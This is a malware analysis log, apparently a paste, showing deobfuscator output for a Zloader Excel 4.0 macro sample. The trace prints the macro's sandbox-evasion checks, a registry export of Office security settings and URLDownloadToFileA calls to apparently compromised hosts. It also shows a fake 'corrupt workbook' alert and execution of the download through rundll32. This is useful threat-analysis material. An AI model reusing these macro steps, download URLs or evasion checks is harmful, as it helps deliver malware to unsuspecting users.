dissectmalware

Zloader - a12b2ef9fe9c7be93533235d83af9b076446b0fb25e3fe16e0

May 16th, 2020
  1. xlmdeobfuscator -f "a12b2ef9fe9c7be93533235d83af9b076446b0fb25e3fe16e0b01f81b5a35144.xlsm" --no-ms-excel -n --day 15
  2.  
  3. This .xlsm sample was converted from the following original .xls file: 6f6ba7e59949cd4869f4cd3d63d556b86313b7e42d2030546426efbef20ee2c1 (shared by https://twitter.com/DynamicAnalysis)
  4.  
  5. [Loading Cells]
  6. auto_open: auto_openbkwak->Sheet2!$FS$52964
  7. [Starting Deobfuscation]
  8. CELL:FS52964 , FullEvaluation ,SET.VALUE(Sheet2!GM52449,"392")
  9. CELL:FS52965 , FullEvaluation ,GOTO(CV24412)
  10. CELL:CV24412 , FullEvaluation ,SET.VALUE(Sheet2!GQ44156,"339")
  11. CELL:CV24413 , FullEvaluation ,GOTO(GZ14878)
  12. CELL:GZ14878 , FullEvaluation ,SET.VALUE(Sheet2!HG1271,"1532")
  13. CELL:GZ14879 , FullEvaluation ,GOTO(CJ53865)
  14. CELL:CJ53865 , FullEvaluation ,SET.VALUE(Sheet2!AC30333,"35.75")
  15. CELL:CJ53866 , FullEvaluation ,GOTO(HO45111)
  16. CELL:HO45111 , FullEvaluation ,SET.VALUE(Sheet2!CS46407,"22")
  17. CELL:HO45112 , FullEvaluation ,GOTO(GX48167)
  18. CELL:GX48167 , FullEvaluation ,SET.VALUE(Sheet2!CI12245,"-59")
  19. CELL:GX48168 , FullEvaluation ,RUN(Sheet2!GG37317)
  20. CELL:GG37317 , FullEvaluation ,SET.VALUE(Sheet2!U1115,"-59")
  21. CELL:GG37318 , FullEvaluation ,GOTO(BS37166)
  22. CELL:BS37166 , FullEvaluation ,SET.VALUE(Sheet2!CN63602,"-406")
  23. CELL:BS37167 , FullEvaluation ,GOTO(X1129)
  24. CELL:X1129 , FullEvaluation ,SET.VALUE(Sheet2!BH34689,"127")
  25. CELL:X1130 , FullEvaluation ,RUN(Sheet2!HV59960)
  26. CELL:HV59960 , FullEvaluation ,SET.VALUE(Sheet2!BK21897,"-353.7")
  27. CELL:HV59961 , FullEvaluation ,RUN(Sheet2!GP29734)
  28. CELL:GP29734 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Sheet2!FK4625)
  29. CELL:GP29735 , FullEvaluation ,GOTO(EW24092)
  30. CELL:EW24092 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Sheet2!EW24093)
  31. CELL:EW24093 , NotImplemented ,APP.MAXIMIZE()
  32. CELL:EW24094 , FullEvaluation ,GOTO(IK5437)
  33. CELL:IK5437 , FullEvaluation ,FORMULA.FILL("=IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)",Sheet2!IK5438)
  34. CELL:IK5438 , FullBranching ,IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)
  35. CELL:IK5438 , FullEvaluation ,[TRUE] GOTO(R[-813]C[-78])
  36. CELL:FK4625 , End , CLOSE(FALSE)
  37. CELL:IK5438 , FullEvaluation ,[FALSE]
  38. CELL:IK5439 , FullEvaluation , GOTO(HS48810)
  39. CELL:HS48810 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))",Sheet2!HS48811)
  40. CELL:HS48811 , FullBranching , IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))
  41. CELL:HS48811 , FullEvaluation , [TRUE]
  42. CELL:HS48812 , FullEvaluation , RUN(Sheet2!HL61953)
  43. CELL:HL61953 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)",Sheet2!HL61954)
  44. CELL:HL61954 , FullBranching , IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)
  45. CELL:HL61954 , FullEvaluation , [TRUE] GOTO(R[-57329]C[-53])
  46. CELL:FK4625 , End , CLOSE(FALSE)
  47. CELL:HL61954 , FullEvaluation , [FALSE]
  48. CELL:HL61955 , FullEvaluation , GOTO(FT3448)
  49. CELL:FT3448 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)",Sheet2!FT3449)
  50. CELL:FT3449 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)
  51. CELL:FT3450 , FullEvaluation , RUN(Sheet2!IL4383)
  52. CELL:IL4383 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)",Sheet2!IL4384)
  53. CELL:IL4384 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)
  54. CELL:IL4384 , FullEvaluation , [TRUE] GOTO(R[241]C[-79])
  55. CELL:FK4625 , End , CLOSE(FALSE)
  56. CELL:IL4384 , FullEvaluation , [FALSE]
  57. CELL:IL4385 , FullEvaluation , RUN(Sheet2!IC43412)
  58. CELL:IC43412 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)",Sheet2!IC43413)
  59. CELL:IC43413 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)
  60. CELL:IC43413 , FullEvaluation , [TRUE] GOTO(R[-38788]C[-70])
  61. CELL:FK4625 , End , CLOSE(FALSE)
  62. CELL:IC43413 , FullEvaluation , [FALSE]
  63. CELL:IC43414 , FullEvaluation , GOTO(AU41565)
  64. CELL:AU41565 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))",Sheet2!AU41566)
  65. CELL:AU41566 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))
  66. CELL:AU41567 , FullEvaluation , RUN(Sheet2!AB17079)
  67. CELL:AB17079 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))",Sheet2!AB17080)
  68. CELL:AB17080 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))
  69. CELL:AB17081 , FullEvaluation , GOTO(IB27416)
  70. CELL:IB27416 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))",Sheet2!IB27417)
  71. CELL:IB27417 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))
  72. CELL:IB27418 , FullEvaluation , RUN(Sheet2!ED65281)
  73. CELL:ED65281 , FullEvaluation , FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!EN14779)
  74. CELL:ED65282 , FullEvaluation , GOTO(IR35245)
  75. CELL:IR35245 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\0tDOFd.reg""",Sheet2!HQ57664)
  76. CELL:IR35246 , FullEvaluation , GOTO(DW28906)
  77. CELL:DW28906 , FullEvaluation , FORMULA.FILL("=R[2390]C[112]&GET.WORKSPACE(2)&""\Excel\Security ""&R[45275]C[193]&"" /y""",Sheet2!AF12389)
  78. CELL:DW28907 , FullEvaluation , GOTO(G52328)
  79. CELL:G52328 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!AJ12831)
  80. CELL:G52329 , FullEvaluation , GOTO(GR56472)
  81. CELL:GR56472 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43642]C[-164],R[-44084]C[-168],0,5)",Sheet2!GR56473)
  82. CELL:GR56473 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",AJ12831,AF12389,0,5)
  83. CELL:GR56474 , FullEvaluation , GOTO(BI831)
  84. CELL:BI831 , FullEvaluation , FORMULA.FILL("=WHILE(ISERROR(FILES(R[56830]C[164])))",Sheet2!BI834)
  85. CELL:BI832 , FullEvaluation , FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Sheet2!BI835)
  86. CELL:BI833 , FullEvaluation , FORMULA.FILL("=NEXT()",Sheet2!BI836)
  87. CELL:BI834 , PartialEvaluation , WHILE(None)
  88. CELL:BI835 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  89. CELL:BI836 , PartialEvaluation , NEXT()
  90. CELL:BI837 , FullEvaluation , RUN(Sheet2!HX58625)
  91. CELL:HX58625 , FullEvaluation , FORMULA.FILL("=FOPEN(R[-962]C[-7])",Sheet2!HX58626)
  92. CELL:HX58626 , PartialEvaluation , FOPEN(None)
  93. CELL:HX58627 , FullEvaluation , RUN(Sheet2!H59022)
  94. CELL:H59022 , FullEvaluation , FORMULA.FILL("=FPOS(R[-397]C[224],215)",Sheet2!H59023)
  95. CELL:H59023 , PartialEvaluation , FPOS(None,215)
  96. CELL:H59024 , FullEvaluation , RUN(Sheet2!HN6157)
  97. CELL:HN6157 , FullEvaluation , FORMULA.FILL("=FREAD(R[52468]C[10],255)",Sheet2!HN6158)
  98. CELL:HN6158 , PartialEvaluation , FREAD(None,255)
  99. CELL:HN6159 , FullEvaluation , GOTO(M12701)
  100. CELL:M12701 , FullEvaluation , FORMULA.FILL("=FCLOSE(R[45924]C[219])",Sheet2!M12702)
  101. CELL:M12702 , PartialEvaluation , FCLOSE(None)
  102. CELL:M12703 , FullEvaluation , GOTO(HS19468)
  103. CELL:HS19468 , FullEvaluation , FORMULA.FILL("=FILE.DELETE(R[38195]C[-2])",Sheet2!HS19469)
  104. CELL:HS19469 , NotImplemented , FILE.DELETE(R[38195]C[-2])
  105. CELL:HS19470 , FullEvaluation , RUN(Sheet2!IP58689)
  106. CELL:IP58689 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)",Sheet2!IP58690)
  107. CELL:IP58690 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)
  108. CELL:IP58691 , FullEvaluation , GOTO(IB46729)
  109. CELL:IB46729 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\Gqjxs.html""",Sheet2!GS57755)
  110. CELL:IB46730 , FullEvaluation , GOTO(CD35438)
  111. CELL:CD35438 , FullEvaluation , FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!EL60834)
  112. CELL:CD35439 , FullEvaluation , GOTO(CD16194)
  113. CELL:CD16194 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[44639]C[60],R[41560]C[119],0,0)",Sheet2!CD16195)
  114. CELL:CD16195 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,EL60834,GS57755,0,0)
  115. CELL:CD16196 , FullEvaluation , GOTO(GD27718)
  116. CELL:GD27718 , FullEvaluation , FORMULA.FILL("=FILES(R[30036]C[15])",Sheet2!GD27719)
  117. CELL:GD27719 , PartialEvaluation , FILES(None)
  118. CELL:GD27720 , FullEvaluation , RUN(Sheet2!HU9549)
  119. CELL:HU9549 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)",Sheet2!HU9550)
  120. CELL:HU9550 , FullBranching , IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)
  121. CELL:HU9550 , FullEvaluation , [TRUE] GOTO(R[-4925]C[-62])
  122. CELL:FK4625 , End , CLOSE(FALSE)
  123. CELL:HU9550 , FullEvaluation , [FALSE]
  124. CELL:HU9551 , FullEvaluation , GOTO(BH42792)
  125. CELL:BH42792 , FullEvaluation , SET.VALUE(Sheet2!CN33795,"84")
  126. CELL:BH42793 , FullEvaluation , RUN(Sheet2!HH59901)
  127. CELL:HH59901 , FullEvaluation , SET.VALUE(Sheet2!DO31023,"442")
  128. CELL:HH59902 , FullEvaluation , GOTO(FU9050)
  129. CELL:FU9050 , FullEvaluation , SET.VALUE(Sheet2!DW59946,"36.8")
  130. CELL:FU9051 , FullEvaluation , RUN(Sheet2!CC60398)
  131. CELL:CC60398 , FullEvaluation , SET.VALUE(Sheet2!G42604,"361")
  132. CELL:CC60399 , FullEvaluation , GOTO(IJ44508)
  133. CELL:IJ44508 , FullEvaluation , SET.VALUE(Sheet2!GB18553,"484")
  134. CELL:IJ44509 , FullEvaluation , GOTO(GI32034)
  135. CELL:GI32034 , FullEvaluation , SET.VALUE(Sheet2!CW23831,"-135.5")
  136. CELL:GI32035 , FullEvaluation , GOTO(D14697)
  137. CELL:D14697 , FullEvaluation , SET.VALUE(Sheet2!C63268,"494")
  138. CELL:D14698 , FullEvaluation , GOTO(AZ42808)
  139. CELL:AZ42808 , FullEvaluation , SET.VALUE(Sheet2!F39004,"235")
  140. CELL:AZ42809 , FullEvaluation , RUN(Sheet2!EB31800)
  141. CELL:EB31800 , FullEvaluation , SET.VALUE(Sheet2!GO1841,"-203")
  142. CELL:EB31801 , FullEvaluation , GOTO(EG40361)
  143. CELL:EG40361 , FullEvaluation , SET.VALUE(Sheet2!AA4633,"11")
  144. CELL:EG40362 , FullEvaluation , GOTO(IB20858)
  145. CELL:IB20858 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\8Z6V7u6.html""",Sheet2!BW44469)
  146. CELL:IB20859 , FullEvaluation , GOTO(DG24068)
  147. CELL:DG24068 , FullEvaluation , FORMULA.FILL("=""http://almakaaseb.com/wp-content/uploads/2020/05/wp-front.php""",Sheet2!BO49765)
  148. CELL:DG24069 , FullEvaluation , GOTO(ES45654)
  149. CELL:ES45654 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[37426]C[-87],R[32130]C[-79],0,0)",Sheet2!EX12339)
  150. CELL:ES45655 , FullEvaluation , RUN(Sheet2!DB59619)
  151. CELL:DB59619 , FullEvaluation , FORMULA.FILL("=FILES(R[27419]C[-152])",Sheet2!HS17050)
  152. CELL:DB59620 , FullEvaluation , GOTO(CH38558)
  153. CELL:CH38558 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))",Sheet2!GF41632)
  154. CELL:CH38559 , FullEvaluation , RUN(Sheet2!FE42412)
  155. CELL:FE42412 , FullEvaluation , FORMULA.FILL("=""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",Sheet2!AM24439)
  156. CELL:FE42413 , FullEvaluation , RUN(Sheet2!GL58286)
  157. CELL:GL58286 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28190]C[-188],R[-8160]C[-152],0,0)",Sheet2!HS52629)
  158. CELL:GL58287 , FullEvaluation , RUN(Sheet2!D8257)
  159. CELL:D8257 , FullEvaluation , FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!FK27640)
  160. CELL:D8258 , FullEvaluation , GOTO(H50016)
  161. CELL:H50016 , FullEvaluation , FORMULA.FILL("=ALERT(R[22870]C[-4])",Sheet2!FO4770)
  162. CELL:H50017 , FullEvaluation , GOTO(FK5361)
  163. CELL:FK5361 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Sheet2!BP21468)
  164. CELL:FK5362 , FullEvaluation , GOTO(HY30127)
  165. CELL:HY30127 , FullEvaluation , FORMULA.FILL("=R[24931]C[-64]&"",DllRegisterServer""",Sheet2!EI19538)
  166. CELL:HY30128 , FullEvaluation , GOTO(ES22445)
  167. CELL:ES22445 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[2101]C[-9],R[171]C[62],0,5)",Sheet2!BY19367)
  168. CELL:ES22446 , FullEvaluation , RUN(Sheet2!EX12339)
  169. CELL:EX12339 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,BO49765,BW44469,0,0)
  170. CELL:EX12340 , FullEvaluation , GOTO(HS17050)
  171. CELL:HS17050 , PartialEvaluation , FILES(None)
  172. CELL:HS17051 , FullEvaluation , GOTO(GF41632)
  173. CELL:GF41632 , FullBranching , IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))
  174. CELL:GF41632 , FullEvaluation , [TRUE]
  175. CELL:GF41633 , FullEvaluation , GOTO(AM24439)
  176. CELL:AM24439 , FullEvaluation , "https://neebank.com/wp-content/uploads/2020/05/wp-front.php"
  177. CELL:AM24440 , FullEvaluation , RUN(Sheet2!HS52629)
  178. CELL:HS52629 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",BW44469,0,0)
  179. CELL:HS52630 , FullEvaluation , RUN(Sheet2!FK27640)
  180. CELL:FK27640 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  181. CELL:FK27641 , FullEvaluation , RUN(Sheet2!FO4770)
  182. CELL:FO4770 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  183. CELL:FO4771 , FullEvaluation , GOTO(BP21468)
  184. CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  185. CELL:BP21469 , FullEvaluation , GOTO(EI19538)
  186. CELL:EI19538 , NotImplemented , BW44469,DllRegisterServer
  187. CELL:EI19539 , FullEvaluation , GOTO(BY19367)
  188. CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","BW44469,DllRegisterServer",0,5)
  189. CELL:BY19368 , FullEvaluation , GOTO(FK4625)
  190. CELL:FK4625 , End , CLOSE(FALSE)
  191. CELL:GF41632 , FullEvaluation , [FALSE] RUN(Sheet2!FO4770)
  192. CELL:FO4770 , PartialEvaluation , ALERT(None)
  193. CELL:FO4771 , FullEvaluation , GOTO(BP21468)
  194. CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  195. CELL:BP21469 , FullEvaluation , GOTO(EI19538)
  196. CELL:EI19538 , NotImplemented , BW44469,DllRegisterServer
  197. CELL:EI19539 , FullEvaluation , GOTO(BY19367)
  198. CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","BW44469,DllRegisterServer",0,5)
  199. CELL:BY19368 , FullEvaluation , GOTO(FK4625)
  200. CELL:FK4625 , End , CLOSE(FALSE)
  201. CELL:HS48811 , FullEvaluation , [FALSE] GOTO(R[-44186]C[-60])
  202. CELL:FK4625 , End , CLOSE(FALSE)
  203. time elapsed: 2.955113649368286